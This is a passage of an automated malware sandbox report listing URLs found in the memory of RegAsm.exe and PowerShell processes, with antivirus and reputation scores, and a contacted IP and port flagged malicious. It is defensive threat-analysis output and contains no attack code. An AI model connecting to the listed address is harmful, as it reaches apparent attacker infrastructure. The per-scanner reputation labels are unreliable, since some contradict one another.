                          http://tempuri.org/Entity/Id21Response4%VirustotalBrowse
                          http://tempuri.org/Entity/Id50%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id81%VirustotalBrowse
                          http://tempuri.org/Entity/Id23ResponseD1%VirustotalBrowse
                          http://tempuri.org/Entity/Id12Response2%VirustotalBrowse
                          http://tempuri.org/Entity/Id2Response2%VirustotalBrowse
                          http://tempuri.org/Entity/Id40%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id70%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id60%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id19Response0%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id91%VirustotalBrowse
                          http://tempuri.org/Entity/Id13ResponseD0%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id6ResponseD1%VirustotalBrowse
                          5.42.92.179:184180%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id15Response0%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id71%VirustotalBrowse
                          http://tempuri.org/Entity/Id14ResponseD2%VirustotalBrowse
                          http://tempuri.org/Entity/Id41%VirustotalBrowse
                          http://tempuri.org/Entity/Id19Response2%VirustotalBrowse
                          http://tempuri.org/Entity/Id13ResponseD1%VirustotalBrowse
                          http://tempuri.org/Entity/Id5ResponseD0%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id6Response0%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id1ResponseD0%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id9Response0%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id61%VirustotalBrowse
                          http://tempuri.org/Entity/Id15Response2%VirustotalBrowse
                          http://tempuri.org/Entity/Id200%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id210%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id220%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id51%VirustotalBrowse
                          http://tempuri.org/Entity/Id230%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id240%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id1ResponseD1%VirustotalBrowse
                          http://tempuri.org/Entity/Id24Response0%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id5ResponseD2%VirustotalBrowse
                          http://tempuri.org/Entity/Id221%VirustotalBrowse
                          http://tempuri.org/Entity/Id1Response0%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id21ResponseD0%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id201%VirustotalBrowse
                          http://tempuri.org/Entity/Id24Response1%VirustotalBrowse
                          http://tempuri.org/Entity/Id231%VirustotalBrowse
                          http://tempuri.org/Entity/Id100%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id6Response2%VirustotalBrowse
                          http://tempuri.org/Entity/Id110%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id10ResponseD0%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id211%VirustotalBrowse
                          http://tempuri.org/Entity/Id241%VirustotalBrowse
                          http://tempuri.org/Entity/Id21ResponseD1%VirustotalBrowse
                          http://tempuri.org/Entity/Id101%VirustotalBrowse
                          http://tempuri.org/Entity/Id120%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id16Response0%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id130%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id9Response2%VirustotalBrowse
                          http://tempuri.org/Entity/Id150%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id140%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id10ResponseD1%VirustotalBrowse
                          http://tempuri.org/Entity/Id160%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id121%VirustotalBrowse
                          http://tempuri.org/Entity/Id131%VirustotalBrowse
                          http://tempuri.org/Entity/Id170%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id180%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id161%VirustotalBrowse
                          http://tempuri.org/Entity/Id5Response0%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id171%VirustotalBrowse
                          http://tempuri.org/Entity/Id151%VirustotalBrowse
                          http://tempuri.org/Entity/Id190%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id111%VirustotalBrowse
                          http://tempuri.org/Entity/Id15ResponseD0%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id16Response2%VirustotalBrowse
                          http://tempuri.org/Entity/Id10Response0%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id11ResponseD0%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id1Response2%VirustotalBrowse
                          http://tempuri.org/Entity/Id181%VirustotalBrowse
                          http://tempuri.org/Entity/Id141%VirustotalBrowse

                          Domains and IPs

                          Contacted Domains

                          No contacted domains info

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          5.42.92.179:18418true
                          • Avira URL Cloud: safe
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#TextRegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://schemas.xmlsoap.org/ws/2005/02/sc/sctRegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://duckduckgo.com/chrome_newtabRegAsm.exe, 00000006.00000002.1871174162.0000000004420000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.0000000003485000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://schemas.xmlsoap.org/ws/2004/04/security/sc/dkRegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://duckduckgo.com/ac/?q=RegAsm.exe, 00000006.00000002.1871174162.0000000004404000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.00000000034E3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1871174162.0000000004420000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.000000000344D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.0000000003485000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://tempuri.org/Entity/Id14ResponseDRegAsm.exe, 00000006.00000002.1861566390.000000000301E000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • 2%, Virustotal, Browse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://tempuri.org/Entity/Id23ResponseDRegAsm.exe, 00000006.00000002.1861566390.0000000003226000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • 1%, Virustotal, Browse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinaryRegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://tempuri.org/Entity/Id12ResponseRegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • 2%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://tempuri.org/RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • 2%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://tempuri.org/Entity/Id2ResponseRegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • 2%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://tempuri.org/Entity/Id21ResponseRegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • 4%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_WrapRegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://tempuri.org/Entity/Id9RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • 1%, Virustotal, Browse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLIDRegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://tempuri.org/Entity/Id8RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • 1%, Virustotal, Browse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://tempuri.org/Entity/Id6ResponseDRegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • 1%, Virustotal, Browse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://tempuri.org/Entity/Id5RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • 1%, Virustotal, Browse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://schemas.xmlsoap.org/ws/2004/10/wsat/PrepareRegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://tempuri.org/Entity/Id4RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • 1%, Virustotal, Browse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://tempuri.org/Entity/Id7RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • 1%, Virustotal, Browse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://tempuri.org/Entity/Id6RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • 1%, Virustotal, Browse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecretRegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://tempuri.org/Entity/Id19ResponseRegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • 2%, Virustotal, Browse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#licenseRegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/IssueRegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://schemas.xmlsoap.org/ws/2004/10/wsat/AbortedRegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://aka.ms/pscore6lBpowershell.exe, 00000004.00000002.1648760741.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1713760985.0000000005361000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequenceRegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://tempuri.org/Entity/Id13ResponseDRegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • 1%, Virustotal, Browse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.1650352774.0000000005EEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1719342950.00000000063CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://schemas.xmlsoap.org/ws/2004/10/wsat/faultRegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://schemas.xmlsoap.org/ws/2004/10/wsatRegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeyRegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://tempuri.org/Entity/Id15ResponseRegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • 2%, Virustotal, Browse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://tempuri.org/Entity/Id5ResponseDRegAsm.exe, 00000006.00000002.1861566390.000000000301E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • 2%, Virustotal, Browse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.1648760741.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1713760985.0000000005361000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.000000000301E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/RenewRegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://schemas.xmlsoap.org/ws/2004/08/addressing/faultp9RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterRegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://tempuri.org/Entity/Id6ResponseRegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • 2%, Virustotal, Browse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKeyRegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://api.ip.sb/ippowershell.exe, 00000005.00000002.1719342950.0000000006DDA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1719342950.000000000650F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1857321756.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000005.00000002.1713760985.00000000054B6000.00000004.00000800.00020000.00000000.sdmptrue
                                                                            • URL Reputation: malware
                                                                            		unknown
                                                                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000005.00000002.1713760985.00000000054B6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://schemas.xmlsoap.org/ws/2004/04/scRegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://tempuri.org/Entity/Id1ResponseDRegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • 1%, Virustotal, Browse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PCRegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/CancelRegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://tempuri.org/Entity/Id9ResponseRegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • 2%, Virustotal, Browse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://contoso.com/Iconpowershell.exe, 00000005.00000002.1719342950.00000000063CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=RegAsm.exe, 00000006.00000002.1871174162.0000000004404000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.00000000034E3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1871174162.0000000004420000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.000000000344D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.0000000003485000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://tempuri.org/Entity/Id20RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • 1%, Virustotal, Browse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      http://tempuri.org/Entity/Id21RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • 1%, Virustotal, Browse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      http://tempuri.org/Entity/Id22RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • 1%, Virustotal, Browse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://tempuri.org/Entity/Id23RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • 1%, Virustotal, Browse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        http://nsis.sf.net/NSIS_ErrorErrorf6FauZ2CEz.exefalse
                                                                                          		high
                                                                                          http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://tempuri.org/Entity/Id24RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            • 1%, Virustotal, Browse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/IssueRegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://tempuri.org/Entity/Id24ResponseRegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              • 1%, Virustotal, Browse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://www.ecosia.org/newtab/RegAsm.exe, 00000006.00000002.1871174162.0000000004404000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.00000000034E3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1871174162.0000000004420000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.000000000344D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.0000000003485000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://tempuri.org/Entity/Id1ResponseRegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                • 2%, Virustotal, Browse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                https://github.com/Pester/Pesterpowershell.exe, 00000005.00000002.1713760985.00000000054B6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequestedRegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnlyRegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/ReplayRegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnegoRegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64BinaryRegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PCRegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKeyRegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://tempuri.org/Entity/Id21ResponseDRegAsm.exe, 00000006.00000002.1861566390.0000000003226000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                • 1%, Virustotal, Browse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://schemas.xmlsoap.org/ws/2004/08/addressingRegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RST/IssueRegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://schemas.xmlsoap.org/ws/2004/10/wsat/CompletionRegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://schemas.xmlsoap.org/ws/2004/04/trustRegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://tempuri.org/Entity/Id10RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        • 1%, Virustotal, Browse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown
                                                                                                                        http://tempuri.org/Entity/Id11RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        • 1%, Virustotal, Browse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown
                                                                                                                        http://tempuri.org/Entity/Id10ResponseDRegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        • 1%, Virustotal, Browse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown
                                                                                                                        http://tempuri.org/Entity/Id12RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        • 1%, Virustotal, Browse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown
                                                                                                                        http://tempuri.org/Entity/Id16ResponseRegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        • 2%, Virustotal, Browse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown
                                                                                                                        http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponseRegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/CancelRegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://tempuri.org/Entity/Id13RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            • 1%, Virustotal, Browse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown
                                                                                                                            http://tempuri.org/Entity/Id14RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            • 1%, Virustotal, Browse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown
                                                                                                                            http://tempuri.org/Entity/Id15RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            • 1%, Virustotal, Browse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown
                                                                                                                            http://tempuri.org/Entity/Id16RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            • 1%, Virustotal, Browse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown
                                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/NonceRegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://tempuri.org/Entity/Id17RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              • 1%, Virustotal, Browse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              		unknown
                                                                                                                              http://tempuri.org/Entity/Id18RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              • 1%, Virustotal, Browse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              		unknown
                                                                                                                              http://tempuri.org/Entity/Id5ResponseRegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              		unknown
                                                                                                                              http://tempuri.org/Entity/Id19RegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              		unknown
                                                                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnsRegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://tempuri.org/Entity/Id15ResponseDRegAsm.exe, 00000006.00000002.1861566390.000000000301E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                		unknown
                                                                                                                                http://tempuri.org/Entity/Id10ResponseRegAsm.exe, 00000006.00000002.1861566390.0000000002F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                		unknown
                                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/RenewRegAsm.exe, 00000006.00000002.1861566390.0000000002FD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://tempuri.org/Entity/Id11ResponseDRegAsm.exe, 00000006.00000002.1861566390.0000000003226000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  		unknown

                                                                                                                                  World Map of Contacted IPs

                                                                                                                                  • No. of IPs < 25%
                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                  • 75% < No. of IPs

                                                                                                                                  Public IPs

                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                  5.42.92.179
                                                                                                                                  		unknownRussian Federation
